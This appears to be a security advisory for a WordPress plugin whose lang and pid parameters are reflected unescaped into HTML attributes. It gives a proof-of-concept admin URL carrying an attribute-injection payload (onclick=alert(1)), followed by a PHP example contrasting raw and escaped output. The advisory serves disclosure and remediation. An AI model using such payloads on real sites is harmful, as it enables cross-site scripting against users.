The plugin does not escape the lang and pid parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues.
https://example.com/wp-admin/admin.php?sib_page_form&action=edit&id=1&pid=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22
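The difference attribute escaping makes to the pid value from the URL above, shown as an added example. It is not the plugin's code: the `<input>` markup and the function names are hypothetical, and `htmlspecialchars()` stands in for WordPress's `esc_attr()` so the file runs without WordPress.

```php
<?php
// Added illustration, not the plugin's source. The <input> markup and the
// function names below are hypothetical.

// The pid value from the proof-of-concept URL on this page, URL-decoded.
$pid = urldecode('xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22');

// Before: the raw parameter is concatenated into a double-quoted attribute.
function render_unescaped(string $pid): string
{
    return '<input type="hidden" name="pid" value="' . $pid . '">';
}

// After: encode for the HTML attribute context. In WordPress code call
// esc_attr(); htmlspecialchars() stands in so this runs without WordPress.
function render_escaped(string $pid): string
{
    $safe = htmlspecialchars($pid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="pid" value="' . $safe . '">';
}

// Parse the markup with an HTML parser and list the attributes that end up
// on the element (requires PHP's bundled DOM extension).
function attribute_names(string $html): array
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

$variants = ['unescaped' => render_unescaped($pid), 'escaped' => render_escaped($pid)];
foreach ($variants as $label => $html) {
    $names = attribute_names($html);
    // Any on* attribute means the parameter broke out of value="...".
    $handlers = array_filter($names, fn($n) => stripos($n, 'on') === 0);
    printf("%-9s attributes: %s | event handlers: %d\n",
        $label, implode(', ', $names), count($handlers));
}
```

The same encoding applies to the lang parameter wherever it is written into an attribute.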
ZhongFu Su(JrXnm) of Wuhan University
Yes
2022-01-12 (about 1 years ago)
2022-09-26 (about 4 months ago)